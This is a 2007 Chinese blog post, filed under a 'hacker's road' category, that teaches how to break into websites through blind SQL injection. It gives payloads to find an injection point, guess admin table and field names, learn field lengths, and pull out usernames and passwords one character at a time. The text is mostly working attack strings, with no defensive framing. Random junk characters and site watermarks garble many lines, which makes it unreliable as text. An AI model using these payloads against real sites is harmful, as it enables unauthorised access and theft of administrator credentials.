入侵网站必备:(经典语句)
上一篇 / 下一篇 2007-06-16 17:35:31 / 个人分类:黑客之路
VL*YD(^
Hc'N01.判断有无注入点
(Y#Mu2rx&{t B0' and 1=1 and 1=2★黑基空间★P*|6}rv
xu(X&E%n)C02.猜表一般的表的名称无非是admin adminuser user pass password 等..
I c&~,J-yIWD0and 0<>(select count(*) from *)
\'{v?QX2\c0and 0<>(select count(*) from admin) ---判断是否存在admin这张表★黑基空间★|'^w;i\LTq;O
U6ds,hk s03.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个
1kUTU1y?0and 0<(select count(*) from admin)★黑基空间★m/o.zB&b7h~9L
and 1<(select count(*) from admin)
Gy&?C0fFa4Z:M*m04.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.★黑基空间★-?%mOu4J:N
L
and 1=(select count(*) from admin where len(*) >0)--
]}m$kHvK0and 1=(select count(*) from admin where len(用户字段名称name)>0)★黑基空间★OTML%hT
and 1=(select count(*) from admin where len(_blank>密码字段名称password)>0)
5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止
-w6AYEt^Lv6X7}I0and 1=(select count(*) from admin where len(*)>0)
K#Xr2LI!D$An0and 1=(select count(*) from admin where len(name)>6) 错误
!g3S;] Tw4pH7JE0and 1=(select count(*) from admin where len(name)>5) 正确 长度是6
j!}*A,xW-U0and 1=(select count(*) from admin where len(name)=6) 正确★黑基空间★;ue(QD!V%Rjo
,NQ-shk'S-R+q0and 1=(select count(*) from admin where len(password)>11) 正确
{u9_ao&~:vE g(H0and 1=(select count(*) from admin where len(password)>12) 错误 长度是12
dfGz-V2c\0and 1=(select count(*) from admin where len(password)=12) 正确★黑基空间★v6] Gj+wKC0La
6.猜解字符
TMqAp0and 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位★黑基空间★p~n+@8K*Q$z
and 1= (select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位
0E
q xT$t5yRl5W4T{0就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了
9C'd{"A t!W'Kp0and 1=(select top 1 count(*) from Admin where Asc(mid (pass,5,1))=51) --★黑基空间★6CI5e;m3fz:|Zc&YE$e
这个查询语句可以猜解中文的用户和_blank>密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.